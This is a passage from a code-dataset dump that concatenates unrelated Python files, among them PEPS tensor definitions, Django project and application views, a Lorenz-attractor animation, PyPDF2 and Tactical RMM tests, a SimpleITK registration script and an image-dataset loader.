raw_values\n else:\n raise ValueError(\"invalid --partitions_sizes argument\")\n","sub_path":"scripts/data_convert/wikipedia_dpr/split_queries_args.py","file_name":"split_queries_args.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"23771323","text":"from __future__ import division\nfrom SimplePEPS.tools.containers import Struct\nfrom SimplePEPS.contract import np, ncon, TensorNetwork\nBond = TensorNetwork.Bond\nTITN = TensorNetwork.TITN\n\nzig_geometry = TITN.HoneycombWF(dims='XY', sites='AB', bonds=('pA', 'pB', 'x', 'y', 'z'))\nbond_dim = Struct(pA=4, pB=4, x=3, y=3, z=3)\n\ngeometry = zig_geometry\n\nsinglet = np.array([[0, 1], [-1, 0]]) # = |01> - |10>\nassert singlet[0, 1] == 1\nassert singlet[1, 0] == -1\n\ntriplet = np.reshape(np.array([[1, 0, 0, 0],[0, 1/np.sqrt(2), 1/np.sqrt(2), 0],[0, 0, 0, 1]]), (3, 2, 2)) # shape 3, 4 -> 3, 2, 2\n\nbond_singlet = np.zeros((3, 3))\nbond_singlet[0, 0] = 1\nbond_singlet[1:3, 1:3] = 1/np.sqrt(2)*singlet\n\nproj = np.zeros((3, 3, 3, 3))\nproj[:, 1:, 1:, 0] = triplet\nproj[:, 1:, 0, 1:] = triplet\nproj[:, 0, 1:, 1:] = triplet\n\n\ndef arrays(g=1):\n \"\"\"\n \"\"\"\n SA = np.zeros((4,3,3,3))\n SA[0, 0, 0, 0] = 1\n SA[1:, :, :, :] = g*proj\n\n\n SB = ncon.ncon([SA, bond_singlet, bond_singlet, bond_singlet],\n 
['pxyz', 'xX', 'yY', 'zZ'],\n sequence='xyz', axes=['p', 'X', 'Y', 'Z'])\n\n return {'A':SA, 'B':SB}\n","sub_path":"SimplePEPS/states/tc/AKLT_tc_vertex.py","file_name":"AKLT_tc_vertex.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"451911281","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.mixins import (\n LoginRequiredMixin, PermissionRequiredMixin)\nfrom notifications.signals import notify\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse, reverse_lazy\nfrom django.db.models import Q\nfrom django.forms.models import modelformset_factory\nfrom django.views.generic import (\n TemplateView, DetailView, UpdateView,\n CreateView, DeleteView, ListView, RedirectView)\n\nimport markdown\nfrom . import models, forms, mixins\n\n\nclass HomeView(TemplateView):\n template_name = 'main/home.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n projects = models.Project.objects \\\n .prefetch_related('positions') \\\n .all()\n project_needs = models.Position \\\n .objects.order_by('name') \\\n .distinct()\n\n context['projects'] = projects\n context['project_needs'] = project_needs\n\n return context\n\n\nclass FilterByPositionView(ListView):\n model = models.Project\n template_name = 'main/home.html'\n\n def get(self, request):\n search_position = request.GET.get('q', '')\n\n if search_position:\n projects = self.model.objects \\\n .filter(positions__name=search_position)\n else:\n projects = self.model.objects.all()\n\n project_needs = models.Position.objects \\\n .order_by('name').distinct()\n\n return render(request, self.template_name, {\n 'projects': projects,\n 'project_needs': project_needs,\n 'search_position': search_position})\n\n\n# -----\n# Projects\n# -----\nclass ProjectCreateView(\n PermissionRequiredMixin, LoginRequiredMixin,\n CreateView):\n\n model = models.Project\n form_project = forms.ProjectForm\n form_positions = forms.PositionFormSet\n permission_required = 'main.employer'\n\n template_name = 'main/project_create.html'\n\n def get(self, request):\n return render(request, self.template_name, {\n 'form_project': self.form_project(prefix='project'),\n 'form_positions': self.form_positions(prefix='positions')\n })\n\n def post(self, request, *args, **kwargs):\n form_project = self.form_project(request.POST, prefix='project')\n form_positions = self.form_positions(request.POST, prefix=\"positions\")\n\n if form_project.is_valid() and form_positions.is_valid():\n project = form_project.save(commit=False)\n project.user = request.user\n project.save()\n\n positions = form_positions.save(commit=False)\n\n for position in positions:\n position.project = project\n position.save()\n\n return redirect('project', pk=project.pk)\n\n return render(request, self.template_name, {\n 'form_project': form_project,\n \"form_positions\": form_positions})\n\n\nclass ProjectDetailView(DetailView):\n model = models.Project\n template_name = 'main/project.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n project = models.Project.objects \\\n .prefetch_related('positions') \\\n .get(pk=self.kwargs.get('pk'))\n\n project.description = markdown.markdown(project.description)\n context['project'] = project\n\n return context\n\n\nclass ProjectEditView(\n PermissionRequiredMixin,\n LoginRequiredMixin,\n 
mixins.ProjectMustBeAuthorMixin,\n UpdateView):\n\n fields = (\n 'title', 'timeline',\n 'applicant_requirements', 'description')\n model = models.Project\n form_project = forms.ProjectForm\n form_positions = forms.PositionFormSet\n template_name = 'main/project_edit.html'\n permission_required = 'main.employer'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n project = models.Project.objects.get(pk=self.kwargs.get('pk'))\n positions = models.Position.objects.filter(project=project)\n\n context['project'] = project\n context['form_project'] = self.form_project(\n instance=project,\n prefix=\"project\")\n context['form_positions'] = self.form_positions(\n instance=project,\n prefix=\"positions\")\n\n return context\n\n def post(self, request, *args, **kwargs):\n project = self.model.objects.get(pk=self.kwargs.get('pk'))\n\n form_project = self.form_project(\n instance=project,\n data=request.POST,\n prefix='project')\n form_positions = self.form_positions(\n instance=project,\n data=request.POST,\n prefix=\"positions\")\n\n if form_project.is_valid() and form_positions.is_valid():\n form_project.save()\n form_positions.save()\n\n return redirect('project', pk=project.pk)\n\n return render(request, self.template_name, {\n 'project': project,\n 'form_project': form_project,\n \"form_positions\": form_positions})\n\n\nclass ProjectDeleteView(\n LoginRequiredMixin, mixins.ProjectMustBeAuthorMixin,\n DeleteView):\n\n model = models.Project\n template_name = 'main/project_delete.html'\n success_url = reverse_lazy('home')\n\n\nclass ApplicationSubmitView(LoginRequiredMixin, CreateView):\n model = models.Application\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n project = get_object_or_404(\n models.Project,\n pk=self.kwargs.get('project_pk'))\n position = get_object_or_404(\n models.Position,\n pk=self.kwargs.get('position_pk'))\n profile = get_object_or_404(\n models.Profile,\n user=self.request.user)\n application = self.model.objects.filter(\n user=user,\n project=project,\n position=position)\n\n if not application:\n application = self.model.objects.create(\n user=user,\n profile=profile,\n position=position,\n project=project)\n\n messages.add_message(\n request,\n messages.SUCCESS,\n 'Application has been submitted!',\n extra_tags='submission')\n\n else:\n messages.add_message(\n request,\n messages.ERROR,\n 'Application has already been submitted!',\n extra_tags='submission')\n\n return redirect(reverse('project', kwargs={\n 'pk': self.kwargs.get('project_pk')}))\n\n\n# -----\n# Profile\n# -----\nclass ProfileView(LoginRequiredMixin, TemplateView):\n model = models.Profile\n template_name = 'main/profile.html'\n\n def get(self, request, pk):\n try:\n profile = self.model.objects.get(pk=pk)\n except models.Profile.DoesNotExist:\n profile = self.model.objects.create(user=request.user)\n\n profile.short_bio = markdown.markdown(profile.short_bio)\n\n projects = models.Project.objects.filter(\n applications__profile__user=request.user,\n applications__status='Accepted')\n\n unread_notifications = request.user.notifications.unread()\n notifications = [str(x) for x in request.user.notifications.unread()]\n unread_notifications.mark_all_as_read()\n\n return render(request, self.template_name, {\n 'notifications': notifications,\n 'profile': profile,\n 'projects': projects})\n\n\nclass ProfileEditView(\n LoginRequiredMixin, mixins.ProfileMustBeAuthorMixin,\n UpdateView):\n\n fields = ('name', 'short_bio', 'profile_image')\n model 
= models.Profile\n form_profile = forms.ProfileForm\n form_user_projects = forms.UserProjectFormSet\n form_skills = forms.SkillFormSet\n template_name = 'main/profile_edit.html'\n\n def get_past_projects(self):\n projects = models.Project.objects.filter(\n applications__profile__user=self.request.user,\n applications__status='Accepted')\n\n return projects\n\n def get_object(self):\n obj = get_object_or_404(self.model, user=self.request.user)\n return obj\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n profile = self.model.objects.get(user=self.request.user)\n projects = self.get_past_projects()\n\n context['projects'] = projects\n context['form_profile'] = self.form_profile(\n instance=profile,\n prefix=\"profile\")\n context['form_user_projects'] = self.form_user_projects(\n instance=profile,\n prefix=\"user_projects\")\n context['form_skills'] = self.form_skills(\n instance=profile,\n prefix=\"skills\")\n\n return context\n\n def post(self, request, *args, **kwargs):\n profile = self.model.objects.get(user=request.user)\n projects = self.get_past_projects()\n\n form_profile = self.form_profile(\n request.POST, request.FILES,\n instance=profile,\n prefix='profile')\n form_user_projects = self.form_user_projects(\n instance=profile,\n data=request.POST,\n prefix=\"user_projects\")\n form_skills = self.form_skills(\n instance=profile, data=request.POST,\n prefix=\"skills\")\n\n if (form_profile.is_valid() and\n form_user_projects.is_valid() and\n form_skills.is_valid()):\n\n profile = form_profile.save()\n form_user_projects.save()\n form_skills.save()\n\n return redirect(reverse('profile', kwargs={\n 'pk': profile.pk}))\n\n return render(request, self.template_name, {\n 'form_profile': form_profile,\n \"form_user_projects\": form_user_projects,\n \"form_skills\": form_skills,\n \"projects\": projects})\n\n\n# -----\n# Applications\n# -----\nclass ApplicationsView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = ''\n\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)).distinct()\n\n return render(request, self.template_name, {\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicationsByProjectNeedView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = 'proj_need'\n q = request.GET.get('q', '')\n\n if q:\n filtered_applicants = self.model.objects \\\n .filter(Q(project__user=request.user) &\n Q(position__name__iexact=q))\n else:\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)).distinct()\n\n return render(request, self.template_name, {\n 'q': q,\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 
'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicationsByProjectView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = 'project'\n q = request.GET.get('q', '')\n\n if q:\n filtered_applicants = self.model.objects \\\n .filter(Q(project__title__iexact=q) &\n Q(project__user=request.user))\n else:\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)) \\\n .distinct()\n\n return render(request, self.template_name, {\n 'q': q,\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicationsByStatusView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = 'status'\n q = request.GET.get('q', '')\n\n if q:\n filtered_applicants = self.model.objects \\\n .filter(Q(project__user=request.user) &\n Q(status__iexact=q))\n else:\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)).distinct()\n\n return render(request, self.template_name, {\n 'q': q,\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicantEditView(\n PermissionRequiredMixin, LoginRequiredMixin,\n mixins.ApplicationMustBeForAuthorMixin,\n UpdateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def post(self, request, *args, **kwargs):\n redirect_path = request.GET.get('redirect', '')\n q = request.GET.get('q', '')\n\n applicant = self.model.objects.get(pk=self.kwargs.get('pk'))\n applicant.status = request.POST['status']\n applicant.save()\n\n if applicant.status == 'Accepted':\n notify.send(\n request.user,\n recipient=applicant.user,\n verb=(\n 'Your application for position {} for project {} has been '\n 'accepted'.format(\n applicant.position.name, applicant.project.title)))\n elif applicant.status == 'Rejected':\n notify.send(\n request.user,\n recipient=applicant.user,\n verb=(\n 'Your application for position {} for project {} has been '\n 'rejected'.format(\n applicant.position.name, applicant.project.title)))\n\n if redirect:\n path = 'applications_' + redirect_path\n else:\n path = 'applications'\n\n if q:\n return redirect(reverse(path) + '?q=' + q)\n\n return redirect(reverse('applications'))\n\n\n# -----\n# Search\n# -----\nclass SearchView(TemplateView):\n model = models.Project\n template_name = 'main/search.html'\n\n def get(self, request):\n search_term = request.GET.get('q', '')\n\n projects = self.model.objects \\\n .prefetch_related('positions') \\\n .filter(\n Q(title__icontains=search_term) |\n Q(description__icontains=search_term)) \\\n 
.order_by('title')\n        project_needs = models.Position.objects \\\n            .order_by('name').distinct()\n\n        return render(request, self.template_name, {\n            'projects': projects,\n            'search_term': search_term,\n            'project_needs': project_needs})","sub_path":"project/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"493606036","text":"import openfst_python as fst\n\n# Build a linear acceptor for the word 'rosebud'.\n# OpenFst arcs carry integer labels; a symbol table maps them back to\n# letters, and label 0 is reserved for epsilon.\nf = fst.Fst()\nletters = list('rosebud')\n\nsyms = fst.SymbolTable()\nEPS = syms.add_symbol('<eps>')\n\nstart = f.add_state()\nf.set_start(start)\n\none = fst.Weight.One(f.weight_type())\nsrc = start\nfor letter in letters:\n    dst = f.add_state()\n    label = syms.add_symbol(letter)\n    f.add_arc(src, fst.Arc(label, label, one, dst))\n    src = dst\n\n# Epsilon arc back to the start state, as in the original sketch.\nf.add_arc(src, fst.Arc(EPS, EPS, one, start))\nf.set_final(src)\nf.set_input_symbols(syms)\nf.set_output_symbols(syms)\n\nprint(f)\n","sub_path":"Lab1/.ipynb_checkpoints/create_fst-checkpoint.py","file_name":"create_fst-checkpoint.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"333786446","text":"# coding: utf-8\n#\n# Copyright 2019 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Stores various constants for Oppia release.\"\"\"\n\nfrom __future__ import absolute_import  # pylint: disable=import-only-modules\nfrom __future__ import unicode_literals  # pylint: disable=import-only-modules\n\nimport os\n\n# Affirmative user confirmations.\nAFFIRMATIVE_CONFIRMATIONS = ['y', 'ye', 'yes']\n\n# PyGithub can fetch milestone only by using the milestone number. Milestones\n# are numbered sequentially as they are created and the number remains fixed.\n# The number for blocking_bugs milestone is 39 which is used to fetch this\n# milestone.\nBLOCKING_BUG_MILESTONE_NUMBER = 39\n\nLABEL_FOR_CURRENT_RELEASE_PRS = 'PR: for current release'\nLABEL_FOR_RELEASED_PRS = 'PR: released'\n\n# The path for generating release_summary.md file for the current release.\nRELEASE_SUMMARY_FILEPATH = os.path.join(\n    os.getcwd(), os.pardir, 'release_summary.md')\n\nREMOTE_URL = 'git@github.com:oppia/oppia.git'\n\nRELEASE_BRANCH_TYPE = 'release'\nHOTFIX_BRANCH_TYPE = 'hotfix'\n","sub_path":"release_constants.py","file_name":"release_constants.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53261258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May  3 22:22:45 2016\n\n@author: AF\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\n\ndef lorenz(x, y, z, s=10, r=25, b=8.0/3):\n    x_dot = s*(y - x)\n    y_dot = r*x - y - x*z\n    z_dot = x*y - b*z\n    return x_dot, y_dot, z_dot\n\ndt = 0.01\nstepCnt = 10000\n\n# Need one more for the initial values\nxs = np.empty((stepCnt + 1,))\nys = np.empty((stepCnt + 1,))\nzs = np.empty((stepCnt + 1,))\n\n'''x_plot = []\ny_plot = []\nz_plot = []'''\n\n# Setting initial values\nxs[0], ys[0], zs[0] = (1.0, 0.0, 0.0)\n\n# Stepping through \"time\".\nfor i in range(stepCnt):\n    # Derivatives of the X, Y, Z state\n    x_dot, y_dot, z_dot = lorenz(xs[i], ys[i], zs[i])\n    xs[i + 1] = xs[i] + (x_dot * dt)\n    ys[i + 1] = ys[i] + (y_dot * dt)\n    zs[i + 1] = zs[i] + (z_dot * dt)\n'''    if xs[i]*xs[i+1]<0.0:\n        r = np.abs(xs[i+1]/xs[i])\n        y_plot.append((ys[i]*r+ys[i+1])/(1+r))\n        z_plot.append((zs[i]*r+zs[i+1])/(1+r)) '''\n    \n\nfig = plt.figure(figsize = (8,6))\nfont = {'family': 'serif',\n        'color': 'darkred',\n        'weight': 'normal',\n        'size': 16}\nax = plt.axes(xlim=(-15, 15), ylim=(0, 35))\nline, = ax.plot([], [], 'k.')\n\ndef init():\n    line.set_data([], [])\n    return line,\n\ndef animate(i):\n    y_plot = []\n    z_plot = []\n    x_p = i/10.0 - 10.0\n    plt.xlabel('y', fontdict=font)\n    plt.ylabel('z', fontdict=font)\n    for j in range(stepCnt):\n        if (xs[j]-x_p)*(xs[j+1]-x_p)<0.0:\n            r = np.abs((xs[j+1]-x_p)/(xs[j]-x_p))\n            y_plot.append((ys[j]*r+ys[j+1])/(1+r))\n            z_plot.append((zs[j]*r+zs[j+1])/(1+r))\n    line.set_data(y_plot,z_plot)\n    return line,\n    \n'''y_plot = []\nz_plot = []\nfor j in range(stepCnt):\n    if xs[j]*xs[j+1]<0.0:\n        r = np.abs(xs[j+1]/xs[j])\n        y_plot.append((ys[j]*r+ys[j+1])/(1+r))\n        z_plot.append((zs[j]*r+zs[j+1])/(1+r))\nplt.scatter(y_plot,z_plot)''' \n\nanim = animation.FuncAnimation(fig, animate, init_func=init, frames=200, interval=20, blit=True)\nplt.show()\nanim.save('chapter3_butterfly.gif', fps=20, writer='pillow')  # 'Feng_Chen' is not a registered movie writer","sub_path":"Exercise/Chapter 3/chapter3_lorenz_model.py","file_name":"chapter3_lorenz_model.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388376783","text":"\n\nfrom xai.brain.wordbase.nouns._coverlet import _COVERLET\n\n#class header\nclass _COVERLETS(_COVERLET, ):\n\tdef __init__(self,): \n\t\t_COVERLET.__init__(self)\n\t\tself.name = "COVERLETS"\n\t\tself.specie = 'nouns'\n\t\tself.basic = "coverlet"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_coverlets.py","file_name":"_coverlets.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539519716","text":"import os\nimport binascii\nimport sys\n\nimport PyPDF2\n\nTESTS_ROOT = os.path.abspath(os.path.dirname(__file__))\nPROJECT_ROOT = os.path.dirname(TESTS_ROOT)\nRESOURCE_ROOT = os.path.join(PROJECT_ROOT, \"Resources\")\n\nsys.path.append(PROJECT_ROOT)\n\n\ndef test_merge():\n pdf_path = os.path.join(RESOURCE_ROOT, \"crazyones.pdf\")\n outline = os.path.join(RESOURCE_ROOT, \"pdflatex-outline.pdf\")\n pdf_forms = os.path.join(RESOURCE_ROOT, \"pdflatex-forms.pdf\")\n\n file_merger = PyPDF2.PdfFileMerger()\n\n # string path:\n file_merger.append(pdf_path)\n file_merger.append(outline)\n file_merger.append(pdf_path, pages=PyPDF2.pagerange.PageRange(slice(0, 0)))\n file_merger.append(pdf_forms)\n\n # PdfFileReader object:\n file_merger.append(PyPDF2.PdfFileReader(pdf_path, \"rb\"))\n\n # Is merging encrypted files broken?\n # encrypted = os.path.join(RESOURCE_ROOT, \"libreoffice-writer-password.pdf\")\n # reader = PyPDF2.PdfFileReader(pdf_path, \"rb\")\n # reader.decrypt(\"openpassword\")\n # file_merger.append(reader)\n\n # File handle\n fh = open(pdf_path, \"rb\")\n file_merger.append(fh)\n\n file_merger.addBookmark(\"A bookmark\", 0)\n\n file_merger.write(\"dont_commit_merged.pdf\")\n file_merger.close()\n","sub_path":"Tests/test_merger.py","file_name":"test_merger.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358545655","text":"from __future__ import print_function\n\nimport SimpleITK as sitk\nfrom PIL import Image\nimport sys\nimport os\n\n\ndef command_iteration(method):\n print(\"{0:3} = {1:10.5f}\".format(method.GetOptimizerIteration(),\n method.GetMetricValue()))\n\n\nfixed_file = '../images/fixedImage.png'\nmoving_file = '../images/movingImage.png'\n\nfixed = sitk.ReadImage(fixed_file, sitk.sitkFloat32)\n\nmoving = sitk.ReadImage(moving_file, sitk.sitkFloat32)\n\ntransformDomainMeshSize = [8]*moving.GetDimension()\ntx = sitk.BSplineTransformInitializer(fixed, transformDomainMeshSize)\n\nprint(\"Initial Parameters:\")\nprint(tx.GetParameters())\n\nR = sitk.ImageRegistrationMethod()\nR.SetMetricAsCorrelation()\n\nR.SetOptimizerAsLBFGSB(gradientConvergenceTolerance=1e-5,\n numberOfIterations=100,\n maximumNumberOfCorrections=5,\n maximumNumberOfFunctionEvaluations=1000,\n costFunctionConvergenceFactor=1e+7)\nR.SetInitialTransform(tx, True)\nR.SetInterpolator(sitk.sitkLinear)\n\nR.AddCommand(sitk.sitkIterationEvent, lambda: command_iteration(R))\n\noutTx = R.Execute(fixed, moving)\n\nprint(\"-------\")\nprint(outTx)\nprint(\"Optimizer stop condition: {0}\".format(R.GetOptimizerStopConditionDescription()))\nprint(\" Iteration: {0}\".format(R.GetOptimizerIteration()))\nprint(\" Metric value: {0}\".format(R.GetMetricValue()))\n\n# sitk.WriteTransform(outTx, sys.argv[3])\n\nif not \"SITK_NOSHOW\" in os.environ:\n\n resampler = sitk.ResampleImageFilter()\n resampler.SetReferenceImage(fixed)\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetDefaultPixelValue(100)\n resampler.SetTransform(outTx)\n\n out = resampler.Execute(moving)\n simg1 = sitk.Cast(sitk.RescaleIntensity(fixed), sitk.sitkUInt8)\n simg2 = sitk.Cast(sitk.RescaleIntensity(out), sitk.sitkUInt8)\n cimg = sitk.Compose(simg1, simg2, simg1//2.+simg2//2.)\n\n nda = 
sitk.GetArrayViewFromImage(cimg)\n    my_pil = Image.fromarray(nda)\n    my_pil.show()\n\n    # sitk.Show(cimg, \"ImageRegistration1 Composition\")\n\n","sub_path":"Learning_projects/SimpleITK_pruebas/pruebas/ImageRegistrationMethodBSpline1.py","file_name":"ImageRegistrationMethodBSpline1.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"80385306","text":"from tacticalrmm.test import TacticalTestCase\nfrom core.tasks import core_maintenance_tasks\nfrom unittest.mock import patch\nfrom model_bakery import baker, seq\n\n\nclass TestCoreTasks(TacticalTestCase):\n    def setUp(self):\n        self.setup_coresettings()\n        self.authenticate()\n\n    def test_core_maintenance_tasks(self):\n        task = core_maintenance_tasks.s().apply()\n        self.assertEqual(task.state, \"SUCCESS\")\n\n    def test_dashboard_info(self):\n        url = \"/core/dashinfo/\"\n        r = self.client.get(url)\n        self.assertEqual(r.status_code, 200)\n\n        self.check_not_authenticated(\"get\", url)\n\n    def test_vue_version(self):\n        url = \"/core/version/\"\n        r = self.client.get(url)\n        self.assertEqual(r.status_code, 200)\n\n        self.check_not_authenticated(\"get\", url)\n\n    def test_get_core_settings(self):\n        url = \"/core/getcoresettings/\"\n        r = self.client.get(url)\n        self.assertEqual(r.status_code, 200)\n\n        self.check_not_authenticated(\"get\", url)\n\n    @patch(\"autotasks.tasks.remove_orphaned_win_tasks.delay\")\n    def test_ui_maintenance_actions(self, remove_orphaned_win_tasks):\n        url = \"/core/servermaintenance/\"\n\n        agents = baker.make_recipe(\"agents.online_agent\", _quantity=3)\n\n        # test with empty data\n        r = self.client.post(url, {})\n        self.assertEqual(r.status_code, 400)\n\n        # test with invalid action\n        data = {\"action\": \"invalid_action\"}\n\n        r = self.client.post(url, data)\n        self.assertEqual(r.status_code, 400)\n\n        # test reload nats action\n        data = {\"action\": \"reload_nats\"}\n        r = self.client.post(url, data)\n        self.assertEqual(r.status_code, 200)\n\n        # test prune db with no tables\n        data = {\"action\": \"prune_db\"}\n        r = self.client.post(url, data)\n        self.assertEqual(r.status_code, 400)\n\n        # test prune db with tables\n        data = {\n            \"action\": \"prune_db\",\n            \"prune_tables\": [\"audit_logs\", \"agent_outages\", \"pending_actions\"],\n        }\n        r = self.client.post(url, data)\n        self.assertEqual(r.status_code, 200)\n\n        # test remove orphaned tasks\n        data = {\"action\": \"rm_orphaned_tasks\"}\n        r = self.client.post(url, data)\n        self.assertEqual(r.status_code, 200)\n        remove_orphaned_win_tasks.assert_called()\n\n        self.check_not_authenticated(\"post\", url)\n","sub_path":"api/tacticalrmm/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"330787058","text":"import random\n\nrandom.random() # >= 0 < 1.0\n\n# With a range (floating-point numbers)\nrandom.uniform(1,10) # >= 1 <= 10\n\n# With a range, integers\nrandom.randrange(10) # >= 0 and < 10\n\nrandom.randrange(0,101)\n\n# With a range and multiples of 2\nrandom.randrange(0,101,2)\n\n\nc = \"Hola Mundo\"\nrandom.choice(c) # Picks a random character\n\nl = [1,2,3,4,5]\nrandom.choice(l)\n\n# Shuffles the elements in place\nrandom.shuffle(l)\n\n# Picks a sample of two elements\nrandom.sample(l,2)\n\n","sub_path":"modulos_paquetes/modulo_random.py","file_name":"modulo_random.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"93529525","text":"import os\nimport tarfile\nimport urllib.request\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport h5py\n\ndef is_png(path):\n    return os.path.splitext(path)[1] == \".png\"\n\ndef download_dataset(url):\n    file_name,_=os.path.splitext(os.path.basename(url))\n    full_path=os.path.join(os.getcwd(),\"storage\", file_name)\n\n    if not os.path.exists(full_path):\n        urllib.request.urlretrieve(url,filename=full_path)\n\n    return full_path\n\ndef show_directories(path):\n    with tarfile.open(path,\"r\") as tar:\n        for name in tar.getnames():\n            if not is_png(name):\n                print(name)\n\ndef extract_dataset(path):\n    dir_name=\"dataset_{}\".format(os.path.basename(path).split(\".\")[0])\n    dir_path=os.path.join(os.path.dirname(path), dir_name)\n\n    if not os.path.exists(dir_path):\n        with tarfile.open(path,\"r\") as tar:\n            tar.extractall(dir_path) \n    \n    return dir_path\n\ndef read_dataset(path,classes,img_width,img_height):\n    n=img_height*img_width\n\n    X=[]\n    Y=[]\n\n    for root, _, files in os.walk(path):\n        for file in files:\n            try:\n                im=mpimg.imread(os.path.join(root, file))\n                X.append(im.reshape(1,n).T)\n\n                dir_name=os.path.basename(root)\n                Y.append(classes.index(dir_name))\n            except:\n                pass\n\n    m=len(X)\n    X=np.array(X).T.reshape((n,m))\n    Y=np.array(Y).T.reshape((1,m))\n\n    return X,Y\n\ndef show_images(X,Y,classes,img_height,img_width):\n    m=X.shape[1]\n    rand_index=np.random.randint(0,m,25)\n\n    plt.figure(figsize=(10,10))\n    for i in range(len(rand_index)):\n        plt.subplot(5,5,i+1)\n        plt.xticks([])\n        plt.yticks([])\n        plt.grid(False)\n        plt.imshow(X[:,rand_index[i]].reshape(img_height,img_width),cmap=plt.cm.binary)\n        plt.xlabel(classes[Y[0,rand_index[i]]])\n    plt.show()\n\ndef show_percentages(Y,classes):\n    total=Y.shape[1]\n    for i in range(len(classes)):\n        count=np.count_nonzero(Y==i)\n        print(\"{0} : {1:.2f}%\".format(classes[i],count/total*100))\n\ndef split_dataset(X,Y,train_size, valid_size,test_size): \n    train_index=train_size\n    valid_index=train_index+valid_size\n    test_index=valid_index+test_size\n\n    p=np.random.permutation(X.shape[1])\n\n    X_split=np.hsplit(X[:,p], [train_index,valid_index,test_index])\n    Y_split=np.hsplit(Y[:,p], [train_index,valid_index,test_index])\n    return X_split[0],X_split[1],X_split[2],Y_split[0],Y_split[1],Y_split[2]\n\ndef get_files(path):\n    file_list=[]\n    for root, _, files in os.walk(path):\n        for file in 